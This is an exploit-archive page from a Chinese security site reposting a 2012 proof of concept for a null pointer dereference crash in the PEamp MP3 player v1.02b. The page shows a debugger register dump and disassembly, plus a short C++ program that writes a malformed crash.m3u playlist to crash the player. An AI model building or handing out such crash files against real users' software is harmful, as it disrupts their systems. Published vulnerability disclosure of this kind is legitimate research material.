首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PEamp Null Pointer Dereference PoC 来源：vfocus.net 作者：Ayrbyte 发布时间：2012-06-11   /*Title: PEamp Null Pointer Dereference PoC Author: Ayrbyte Link: http:www.softpedia.com/get/Multimedia/Audio/Audio-Players/mp3player.shtml Versi: v1.02b Tested on: Windows 7 Fb: facebook.com/Ayrbyte Greetz To : all CREMY Family, and for all indonesian indonesian h4x0r     ??  %%  %% $$$$$        >>  > ::    ;;;;;;;;    ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;;   ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;; ??   ??    %% $$$$  ||  ||     > ::    ;;       %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;     ______________>>Ayrbyte<<_______________    Gamerz From CREMY | CRazy Experience arMY [register] eax=ffffffff ebx=76b0cc62 ecx=199dee10 edx=00000000 esi=03342d28 edi=0040141b eip=750b736d esp=0012ed34 ebp=0012ed5c iopl=0         nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246 [diasembly] KERNELBASE!lstrlen: 750b7353 6a08            push    8 750b7355 6890730b75      push    offset KERNELBASE!lstrlen+0x3d (750b7390) 750b735a e841a3ffff      call    KERNELBASE!ReleaseMutex+0x3f (750b16a0) 750b735f 8b4508          mov     eax,dword ptr [ebp+8] 750b7362 85c0            test    eax,eax 750b7364 741f            je      KERNELBASE!lstrlen+0x32 (750b7385) 750b7366 8365fc00        and     dword ptr [ebp-4],0 750b736a 8d5001          lea     edx,[eax+1] 750b736d 8a08            mov     cl,byte ptr [eax]          ds:0023:ffffffff=?? <--NullPointer 750b736f 40              inc     eax 750b7370 84c9            test    cl,cl 750b7372 75f9            jne     KERNELBASE!lstrlen+0x1a (750b736d) 750b7374 2bc2            sub     eax,edx 750b7376 c745fcfeffffff  mov     dword ptr [ebp-4],0FFFFFFFEh 750b737d e86ea4ffff      call    KERNELBASE!WaitForSingleObjectEx+0xc0 (750b17f0) 750b7382 c20400          ret     4 750b7385 33c0            xor     eax,eax 750b7387 ebf4            jmp     KERNELBASE!lstrlen+0x2a (750b737d) *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\KERNELBASE.dll - KERNELBASE!lstrlen+0x1a: eax overwrite with ffffffff, in offset 750b736d, (mov cl,byte ptr [eax]) ds:0023:ffffffff=?? <--Null Pointer Dereference */ //Poc : #include <iostream> using namespace std; //WARNING: for first load crash.m3u after that klik "add" or "load" or "save" //it will make program be crash char _isi[] =   "http://."; char _A[] = "\xFF"; int main(){     FILE *_file;     #define _namefile "crash.m3u"     _file = fopen(_namefile, "w");     fputs(_isi, _file);     for(int i=0;i<1337;i++){fputs(_A, _file);}     fclose(_file);     return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Symantec Web Gateway 5.0.2.8 A ·PEamp (.mp3) Memmory Corruptio ·Microsoft IIS 6.0 and 7.5 Mult ·Safari On iOS Denial Of Servic ·Tom Sawyer Software GET Extens ·MS12-005 Microsoft Office Clic ·Sielco Sistemi Winlog Buffer O ·Total Video Player V1.31 [.flv ·ComSndFTP Server 1.3.7 Beta Re ·F5 BIG-IP Remote Root Authenti ·MYSQL CVE-2012-2122 Authentica ·Microsoft IIS MDAC msadcs.dll   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved